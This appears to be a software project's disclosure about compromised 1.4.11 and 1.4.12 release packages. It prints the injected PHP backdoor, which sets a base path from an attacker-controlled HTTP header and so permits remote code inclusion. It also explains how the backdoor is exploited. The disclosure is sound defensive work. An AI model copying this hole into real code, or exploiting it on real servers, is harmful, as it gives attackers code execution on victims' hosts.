Shortly after we released 1.4.12, somebody reported that the package didn’t match our checksum for it. This is not a good sign, so we set out to find out what might have happened. It turns out that one of the package managers had their account compromised, and the files released in 1.4.11, and 1.4.12, were modified after they were released.
The file change was quite tiny, 3 additional lines of code (and an additional one for a comment)…
/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}
Initial views on the code change showed this shouldn’t be able to do anything, because HTTP_BASE_PATH wasn’t a defined variable. That’s where the problem is. These variables are passed in from the HTTP server, which means that the remote user could push them via the http transaction, and get PHP to load them. This is a bad thing, because it means that the next page loaded would really be loaded from the remote host. This then allows the user to execute malicious PHP code, as the webserver user, on the victim’s host, without any interaction with the victim at all.
Because of this, instead of redeploying the packages (which we initially did), we decided to pull both 1.4.11, and 1.4.12 from the site, and deploy 1.4.13.